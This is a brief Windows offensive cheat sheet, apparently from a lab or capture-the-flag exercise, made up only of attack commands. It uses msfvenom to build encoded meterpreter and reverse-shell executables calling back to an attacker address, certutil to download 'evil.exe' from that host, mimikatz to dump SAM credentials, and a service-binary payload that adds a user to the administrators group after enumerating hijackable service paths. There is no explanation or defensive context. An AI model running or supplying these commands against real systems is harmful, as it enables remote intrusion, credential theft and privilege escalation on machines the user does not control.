Windows Cheat Sheet

Generate a revshell

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.66.218 LPORT=1234 -f exe -o exp.exe

certutil.exe -urlcache -split -f http://10.11.66.218:9999/evil.exe C:\\Temp\\evil.exe

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Upload mimikatz

privilege::debug
lsadump::sam

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

icacls "C:\Program Files\Development Files"

msfvenom -p windows/exec CMD="net localgroup administrators sage /add" -f exe-service -o Devservice.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.66.218 LPORT=1234 -f exe-service -o Devservice.exe

sc qc "Development Service"